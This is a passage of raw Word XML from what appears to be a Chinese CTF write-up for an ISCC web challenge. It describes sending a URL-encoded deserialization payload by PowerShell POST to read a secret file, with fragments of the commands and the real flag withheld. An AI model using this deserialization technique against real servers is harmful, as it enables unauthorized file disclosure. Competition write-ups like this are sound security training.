          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">阶段二的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Payload </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">投递方式</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">根据接口的准入规范：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pP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我们需要将上一步脚本打印出的反序列化字符串进行严谨的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> URL </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Encode，随后使用标准的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> POST </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">表单形式投递至服务器。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PowerShell </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">为例，具体的构造与发送命令如下：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EscapeDataString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'&lt;你的序列化串&gt;'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python probe_http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mechanism_chamber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 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VariableTok"/>
        </w:rPr>
        <w:t xml:space="preserve">$body</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">发送无误的话，网页的回显将会忠实地呈现出目标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文件内埋藏的密文。</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">遵照约定，本篇解析中隐去了真实的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> flag </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">字符串，但只要按照上述步骤推进至此，胜利的果实自然触手可及。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D:\edu\Darkwell\Game\ISCC\region_level\WEB(1)\probe_http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:\edu\Darkwell\Game\ISCC\region_level\WEB(1)\probe_http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2026-05-17T07:45:40Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-05-17T07:45:40Z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